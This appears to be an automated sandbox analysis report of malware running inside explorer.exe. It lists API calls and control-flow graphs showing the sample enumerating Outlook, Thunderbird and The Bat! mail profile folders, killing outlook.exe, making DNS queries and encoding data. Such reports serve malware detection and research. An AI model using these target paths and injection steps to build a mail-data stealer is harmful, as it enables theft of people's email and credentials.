                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF02B7021571A8FEF446FB84498336B5D0FB0831DF18473DE45AC22D0D77488468703

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 251 1922b4-1922c6 252 1922c8-1922d0 CreateStreamOnHGlobal 251->252 253 1922d6-1922e6 251->253 252->253
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE ref: 001922D0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateGlobalStream
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2244384528-0
                                                                                                                                                                                                              • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                                                                              • Instruction ID: c9a8053a8168de25ac7323a8a36e7d24cfa4328c0c735cf41fff6c12615043fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EE0C230108B0A8FDB58AFBCE4CA07933A1FB9C252B05053FE005CB114D27988C1C741

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 254 19298c-192997 255 192999-19299c 254->255 256 1929b5 254->256 255->256 257 19299e-1929a7 GetFileAttributesW 255->257 258 1929b7-1929bc 256->258 259 1929a9-1929af 257->259 260 1929b1-1929b3 257->260 259->260 260->258
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE ref: 0019299E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                                                                                              • Instruction ID: b878910cf4ac27eeeaa461caac8182f50a55c279510a0f00d114d032d3ecd606
                                                                                                                                                                                                              • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BD0A722712915277F6826F908DD27130A0D71932EF94033AEA36C51E0E3A5CCD5A201

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 261 191860-191870 call 191ad4 264 191872-191880 RtlFreeHeap 261->264 265 191886-19188b 261->265 264->265
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                                                                                              • Instruction ID: 18569adbe7bb0e640094fa81c5465fabc9faffa733a5ce6104e562fca6a8c509
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7D01264716A051BEF2CBBFA1C8D1747AD2E768212B588065B819C3261DE39CCD5C342

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:14.4%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:96.2%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:211
                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                              execution_graph 674 2f59d24 676 2f59caf 674->676 675 2f59f00 VirtualProtect VirtualProtect 677 2f59ec9 675->677 676->675 676->677 805 2f518f4 CreateFileW 806 2f5196d 805->806 807 2f51919 GetFileSize 805->807 808 2f51965 CloseHandle 807->808 809 2f51929 807->809 808->806 809->808 815 2f529b7 GetProcessHeap RtlAllocateHeap 809->815 811 2f51936 ReadFile 812 2f5194b 811->812 813 2f52999 3 API calls 812->813 814 2f51964 813->814 814->808 815->811 828 2f51e44 829 2f51e5b lstrlen CharLowerBuffA 828->829 835 2f51ec7 828->835 830 2f51e75 829->830 832 2f51e9d 829->832 831 2f51e7f lstrcmpiA 830->831 830->832 831->830 831->835 832->835 837 2f51ece StrStrIA 832->837 836 2f52692 lstrlen RtlMoveMemory 836->835 838 2f51ef5 RtlMoveMemory RtlMoveMemory StrStrIA 837->838 839 2f51eb3 837->839 838->839 840 2f51f37 StrStrIA 838->840 839->835 839->836 840->839 841 2f51f4a StrStrIA 840->841 841->839 842 2f51f5d lstrlen 841->842 842->839 843 2f51f6a 842->843 843->839 844 2f51f9b lstrlen 843->844 844->839 844->843 854 2f52917 lstrlenW WideCharToMultiByte 816 2f59cf6 818 2f59caf 816->818 817 2f59f00 VirtualProtect VirtualProtect 819 2f59ec9 817->819 818->816 818->817 818->819 678 2f51000 679 2f51007 678->679 680 2f51010 678->680 682 2f51016 679->682 690 2f527e2 VirtualQuery 682->690 685 2f51022 685->680 687 2f5102e RtlMoveMemory NtUnmapViewOfSection 693 2f5104f 687->693 691 2f5101e 690->691 691->685 692 2f529b7 GetProcessHeap RtlAllocateHeap 691->692 692->687 732 2f529b7 GetProcessHeap RtlAllocateHeap 693->732 695 2f5105c 733 2f529b7 GetProcessHeap RtlAllocateHeap 695->733 697 2f5106b ExpandEnvironmentStringsW 698 2f51085 697->698 699 2f5108c ExpandEnvironmentStringsW 697->699 734 2f5123a 698->734 701 2f510a0 ExpandEnvironmentStringsW 699->701 702 2f51099 699->702 704 2f510b4 SHGetSpecialFolderPathW 701->704 705 2f510ad 701->705 703 2f5123a 24 API calls 702->703 703->701 707 2f510c5 704->707 708 2f510cc ExpandEnvironmentStringsW 704->708 706 2f5123a 24 API calls 705->706 706->704 709 2f5123a 24 API calls 707->709 710 2f510e0 ExpandEnvironmentStringsW 708->710 711 2f510d9 708->711 709->708 713 2f510f4 ExpandEnvironmentStringsW 710->713 714 2f510ed 710->714 741 2f511cc 711->741 716 2f51101 713->716 717 2f51108 ExpandEnvironmentStringsW 713->717 756 2f51192 714->756 718 2f51192 16 API calls 716->718 719 2f51115 717->719 720 2f5111c ExpandEnvironmentStringsW 717->720 718->717 721 2f51192 16 API calls 719->721 722 2f51130 720->722 723 2f51129 720->723 721->720 763 2f52999 722->763 724 2f51192 16 API calls 723->724 724->722 727 2f51187 ExitProcess 729 2f5114e 730 2f5117f 729->730 731 2f51158 wsprintfA 729->731 730->727 731->730 731->731 732->695 733->697 769 2f5274a CreateToolhelp32Snapshot 734->769 739 2f5255c 16 API calls 740 2f51268 739->740 740->699 742 2f5255c 16 API calls 741->742 743 2f511e6 742->743 744 2f5255c 16 API calls 743->744 745 2f511f3 744->745 746 2f5255c 16 API calls 745->746 747 2f51200 746->747 748 2f5255c 16 API calls 747->748 749 2f5120d 748->749 750 2f5255c 16 API calls 749->750 751 2f5121a 750->751 752 2f5255c 16 API calls 751->752 753 2f51227 752->753 754 2f5255c 16 API calls 753->754 755 2f51234 754->755 755->710 757 2f5255c 16 API calls 756->757 758 2f511ac 757->758 759 2f5255c 16 API calls 758->759 760 2f511b9 759->760 761 2f5255c 16 API calls 760->761 762 2f511c6 761->762 762->713 764 2f527e2 VirtualQuery 763->764 765 2f529a1 764->765 766 2f51137 765->766 767 2f529a5 GetProcessHeap HeapFree 765->767 766->727 768 2f529b7 GetProcessHeap RtlAllocateHeap 766->768 767->766 768->729 770 2f52765 Process32First 769->770 771 2f51249 769->771 772 2f527ae 770->772 778 2f5255c 771->778 773 2f527b2 CloseHandle 772->773 774 2f5277f lstrcmpiA 772->774 773->771 775 2f52795 774->775 776 2f527a0 Process32Next 774->776 793 2f527be OpenProcess 775->793 776->772 796 2f529b7 GetProcessHeap RtlAllocateHeap 778->796 780 2f5257a lstrcatW PathAppendW 781 2f525a2 FindFirstFileW 780->781 782 2f5265d 780->782 781->782 786 2f525b9 781->786 783 2f52999 3 API calls 782->783 785 2f5125b 783->785 784 2f525bd RtlZeroMemory 784->786 785->739 786->784 787 2f5260f lstrcatW PathAppendW 786->787 788 2f5263e FindNextFileW 786->788 791 2f525df lstrcatW PathAppendW 786->791 792 2f5255c 5 API calls 786->792 787->788 789 2f52627 StrStrIW 787->789 788->784 790 2f52652 FindClose 788->790 789->786 789->788 790->782 791->786 791->788 792->786 794 2f527e0 793->794 795 2f527d0 TerminateProcess CloseHandle 793->795 794->776 795->794 796->780 855 2f52013 856 2f52036 855->856 857 2f52029 lstrlen 855->857 866 2f529b7 GetProcessHeap RtlAllocateHeap 856->866 857->856 859 2f5203e lstrcat 860 2f52073 lstrcat 859->860 861 2f5207a 859->861 860->861 867 2f520a7 861->867 864 2f52999 3 API calls 865 2f5209d 864->865 866->859 901 2f52415 867->901 871 2f520d4 906 2f52938 lstrlen MultiByteToWideChar 871->906 873 2f520e3 907 2f524cc RtlZeroMemory 873->907 876 2f52135 RtlZeroMemory 878 2f5216a 876->878 877 2f52999 3 API calls 879 2f5208a 877->879 881 2f523f7 878->881 884 2f52198 878->884 909 2f5243d 878->909 879->864 881->877 882 2f523dd 882->881 883 2f52999 3 API calls 882->883 883->881 884->882 918 2f529b7 GetProcessHeap RtlAllocateHeap 884->918 886 2f52268 wsprintfW 887 2f5228e 886->887 890 2f522fb 887->890 919 2f529b7 GetProcessHeap RtlAllocateHeap 887->919 889 2f522c8 wsprintfW 889->890 900 2f523ba 890->900 920 2f529b7 GetProcessHeap RtlAllocateHeap 890->920 891 2f52999 3 API calls 893 2f523ce 891->893 893->882 894 2f52999 3 API calls 893->894 894->882 895 2f523b3 898 2f52999 3 API calls 895->898 896 2f52346 896->895 921 2f5296b VirtualAlloc 896->921 898->900 899 2f523a0 RtlMoveMemory 899->895 900->891 902 2f5241f 901->902 904 2f520c6 901->904 922 2f52818 lstrlen lstrlen 902->922 905 2f529b7 GetProcessHeap RtlAllocateHeap 904->905 905->871 906->873 908 2f520f3 907->908 908->876 908->881 910 2f524ab 909->910 912 2f5244a 909->912 910->884 911 2f5244e DnsQuery_W 911->912 912->910 912->911 913 2f5248d DnsFree inet_ntoa 912->913 913->912 914 2f524ad 913->914 924 2f529b7 GetProcessHeap RtlAllocateHeap 914->924 916 2f524b7 925 2f52938 lstrlen MultiByteToWideChar 916->925 918->886 919->889 920->896 921->899 923 2f52839 922->923 923->904 924->916 925->910 820 2f526ac lstrlen 821 2f526c4 CryptBinaryToStringA 820->821 822 2f526f3 820->822 821->822 823 2f526d7 821->823 826 2f529b7 GetProcessHeap RtlAllocateHeap 823->826 825 2f526e2 CryptBinaryToStringA 825->822 826->825 827 2f5295c VirtualFree 797 2f5118f 798 2f51192 797->798 799 2f5255c 16 API calls 798->799 800 2f511ac 799->800 801 2f5255c 16 API calls 800->801 802 2f511b9 801->802 803 2f5255c 16 API calls 802->803 804 2f511c6 803->804 845 2f51e3e 846 2f51e5b lstrlen CharLowerBuffA 845->846 852 2f51ec7 845->852 847 2f51e75 846->847 849 2f51e9d 846->849 848 2f51e7f lstrcmpiA 847->848 847->849 848->847 848->852 850 2f51ece 8 API calls 849->850 849->852 851 2f51eb3 850->851 851->852 853 2f52692 lstrlen RtlMoveMemory 851->853 853->852

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02F529B7: GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
                                                                                                                                                                                                                • Part of subcall function 02F529B7: RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,?,02F518F4), ref: 02F52588
                                                                                                                                                                                                              • PathAppendW.SHLWAPI(00000000,*.*,?,02F518F4), ref: 02F52594
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,02F518F4), ref: 02F525A8
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00000209,00000209), ref: 02F525C3
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000209,?,?,02F518F4), ref: 02F525E1
                                                                                                                                                                                                              • PathAppendW.SHLWAPI(00000209,?,?,02F518F4), ref: 02F525ED
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000209,?,?,02F518F4), ref: 02F52611
                                                                                                                                                                                                              • PathAppendW.SHLWAPI(00000209,?,?,02F518F4), ref: 02F5261D
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000209,?,?,02F518F4), ref: 02F5262C
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,?,?,02F518F4), ref: 02F52644
                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,?,02F518F4), ref: 02F52653
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                              • API String ID: 1648349226-438819550
                                                                                                                                                                                                              • Opcode ID: 0583e12b828f981330c92a254e64e790bb0feb4f27fc7193783b14853c969d0e
                                                                                                                                                                                                              • Instruction ID: ff12978125b8565e8a8378dbc5774b368694f5831cc9b911706dfc479deee171
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0583e12b828f981330c92a254e64e790bb0feb4f27fc7193783b14853c969d0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE218E71A043299FD710AF249D48A6FFBECEF95BC8F000A18FF5192141DB34C9168B66

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02F527E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,02F52664,?,02F518F4), ref: 02F527EF
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02F5103A
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02F51043
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675517319-0
                                                                                                                                                                                                              • Opcode ID: 1c39e081934a2a8c25331090c804343652c2e468bd2953af0c6d605f789c9d5c
                                                                                                                                                                                                              • Instruction ID: a7ac9b9714208eb0ca20091448ce2d44e9388d577ac6698c12cfc33fbd141a9f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c39e081934a2a8c25331090c804343652c2e468bd2953af0c6d605f789c9d5c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AED05E31C44378A7CA647778BC18ACB3E4D9F05BF0B244B51BF39A21C1C97949508BB0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02F529B7: GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
                                                                                                                                                                                                                • Part of subcall function 02F529B7: RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1
                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F5107F
                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F51093
                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F510A7
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,02F5104E,?,02F51010), ref: 02F510BB
                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F510D3
                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F510E7
                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F510FB
                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F5110F
                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F51123
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02F5116B
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02F51189
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                                                                                                                                                                              • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                                                                                                                                                                              • API String ID: 1709485025-1688604020
                                                                                                                                                                                                              • Opcode ID: e7c05dca1b29cb19d272efff4c7085450a7a7610695886687510347c4935c596
                                                                                                                                                                                                              • Instruction ID: ee8eff1138c64139bf9358e101d53a0fe4d5baa9e3fae4f448e151035d4f27de
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7c05dca1b29cb19d272efff4c7085450a7a7610695886687510347c4935c596
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C031BF51B803396BFA2132694C55F7F7A4E9F81FD8B0501A4AF0EEA381DF54EC018AB1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F52758
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 02F52777
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02F5278B
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02F527A8
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02F527B3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                                                                                              • String ID: outlook.exe
                                                                                                                                                                                                              • API String ID: 868014591-749849299
                                                                                                                                                                                                              • Opcode ID: 45233f1a4ab97f9bfcfc05649b91b2c9d1d7d2c957171a47f035793d84c8bbbc
                                                                                                                                                                                                              • Instruction ID: f15e130b9082334af704e1ff24836ed3a7881e5f9cd2baa1010893b0705904d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45233f1a4ab97f9bfcfc05649b91b2c9d1d7d2c957171a47f035793d84c8bbbc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AF06831D4133CABD710EA68EC48BDDB77C9F087E5F0006D0EF59A1181EB3489654B91

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 82 2f59cf6-2f59d10 83 2f59d15 82->83 84 2f59d16-2f59d28 83->84 86 2f59d8e-2f59d8f 84->86 87 2f59d2a 84->87 88 2f59d90-2f59d95 86->88 89 2f59d2c-2f59d36 87->89 90 2f59caf-2f59cbd 87->90 93 2f59d96-2f59d98 88->93 89->83 94 2f59d38-2f59d43 89->94 91 2f59cd1-2f59cf4 90->91 92 2f59cbf-2f59cce 90->92 91->82 92->91 95 2f59da1 93->95 96 2f59d9a-2f59d9f 93->96 97 2f59d44-2f59d4c 94->97 95->88 98 2f59da3 95->98 96->95 97->97 99 2f59d4e-2f59d50 97->99 100 2f59da8-2f59daa 98->100 101 2f59d52-2f59d55 99->101 102 2f59d79-2f59d88 99->102 103 2f59db3-2f59db7 100->103 104 2f59dac-2f59db1 100->104 101->84 105 2f59d57-2f59d75 101->105 102->96 103->100 107 2f59db9 103->107 104->103 105->102 106 2f59f3d 105->106 106->106 108 2f59dc4-2f59dc9 107->108 109 2f59dbb-2f59dc2 107->109 110 2f59dd8-2f59dda 108->110 111 2f59dcb-2f59dd4 108->111 109->100 109->108 112 2f59de3-2f59de7 110->112 113 2f59ddc-2f59de1 110->113 114 2f59dd6 111->114 115 2f59e4a-2f59e4d 111->115 117 2f59df0-2f59df2 112->117 118 2f59de9-2f59dee 112->118 113->112 114->110 116 2f59e52-2f59e55 115->116 119 2f59e57-2f59e59 116->119 120 2f59e14-2f59e23 117->120 121 2f59df4 117->121 118->117 119->116 122 2f59e5b-2f59e5e 119->122 124 2f59e25-2f59e2c 120->124 125 2f59e34-2f59e41 120->125 123 2f59df5-2f59df7 121->123 122->116 126 2f59e60-2f59e7c 122->126 127 2f59e00-2f59e04 123->127 128 2f59df9-2f59dfe 123->128 124->124 129 2f59e2e 124->129 125->125 130 2f59e43-2f59e45 125->130 126->119 131 2f59e7e 126->131 127->123 132 2f59e06 127->132 128->127 129->93 130->93 133 2f59e84-2f59e88 131->133 134 2f59e11 132->134 135 2f59e08-2f59e0f 132->135 136 2f59ecf-2f59ed2 133->136 137 2f59e8a-2f59ea0 133->137 134->120 135->123 135->134 138 2f59ed5-2f59edc 136->138 145 2f59ea1-2f59ea6 137->145 139 2f59f00-2f59f30 VirtualProtect * 2 138->139 140 2f59ede-2f59ee0 138->140 144 2f59f34-2f59f38 139->144 142 2f59ef3-2f59efe 140->142 143 2f59ee2-2f59ef1 140->143 142->143 143->138 144->144 146 2f59f3a 144->146 145->133 147 2f59ea8-2f59eaa 145->147 146->106 148 2f59eb3-2f59ec0 147->148 149 2f59eac-2f59eb2 147->149 151 2f59ec2-2f59ec7 148->151 152 2f59ec9-2f59ecc 148->152 149->148 151->145
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F58000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F58000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f58000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5ec1d821bb1014c1affa9bc600fb0a0d9767a64e4ac34f5c0f6d5693ee9b7548
                                                                                                                                                                                                              • Instruction ID: 73a25765dea4d8bfad5cdc64c6d36c39094f4d103c395a94fb1ae15f634aaf3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ec1d821bb1014c1affa9bc600fb0a0d9767a64e4ac34f5c0f6d5693ee9b7548
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF912B729153A1CFD71A4A74CDC07B57BA0EB422A4B5C0669CFD2CB286E7E46806C7E0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 162 2f529b7-2f529c7 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                              • Opcode ID: 278caca1d391f710eaabe6ca98291b507b74ea8b291e50d008419c73ba7ae75b
                                                                                                                                                                                                              • Instruction ID: 1cba029ede5f6f653073c05b660e41bbd25e69c4bde1bf7bc9ee544f4f57b0f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 278caca1d391f710eaabe6ca98291b507b74ea8b291e50d008419c73ba7ae75b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68A002B1D903245BDD8457BDAE0DA15F528AF44BC5F004984734685444996454348721

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 170 2f520a7-2f52102 call 2f52415 call 2f529b7 call 2f52938 call 2f524cc 179 2f52104-2f5211b 170->179 180 2f5211d-2f52129 170->180 183 2f5212d-2f5212f 179->183 180->183 184 2f52135-2f5216c RtlZeroMemory 183->184 185 2f52403-2f52412 call 2f52999 183->185 189 2f52172-2f5218d 184->189 190 2f523fb-2f52402 184->190 191 2f521bf-2f521d1 189->191 192 2f5218f-2f521a0 call 2f5243d 189->192 190->185 199 2f521d5-2f521d7 191->199 197 2f521b3 192->197 198 2f521a2-2f521b1 192->198 200 2f521b5-2f521bd 197->200 198->200 201 2f521dd-2f52239 call 2f52866 199->201 202 2f523e8-2f523ee 199->202 200->199 210 2f523e1 201->210 211 2f5223f-2f52244 201->211 204 2f523f7 202->204 205 2f523f0-2f523f2 call 2f52999 202->205 204->190 205->204 210->202 212 2f52246-2f52257 211->212 213 2f5225e-2f5228c call 2f529b7 wsprintfW 211->213 212->213 216 2f522a5-2f522bc 213->216 217 2f5228e-2f52290 213->217 222 2f522be-2f522f4 call 2f529b7 wsprintfW 216->222 223 2f522fb-2f52315 216->223 218 2f52291-2f52294 217->218 220 2f52296-2f5229b 218->220 221 2f5229f-2f522a1 218->221 220->218 224 2f5229d 220->224 221->216 222->223 228 2f523be-2f523d4 call 2f52999 223->228 229 2f5231b-2f5232e 223->229 224->216 236 2f523d6-2f523d8 call 2f52999 228->236 237 2f523dd 228->237 229->228 233 2f52334-2f5234a call 2f529b7 229->233 240 2f5234c-2f52357 233->240 236->237 237->210 241 2f52359-2f52366 call 2f5297c 240->241 242 2f5236b-2f52382 240->242 241->242 246 2f52384 242->246 247 2f52386-2f52393 242->247 246->247 247->240 248 2f52395-2f52399 247->248 249 2f523b3-2f523ba call 2f52999 248->249 250 2f5239b 248->250 249->228 251 2f5239b call 2f5296b 250->251 253 2f523a0-2f523ad RtlMoveMemory 251->253 253->249
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02F529B7: GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
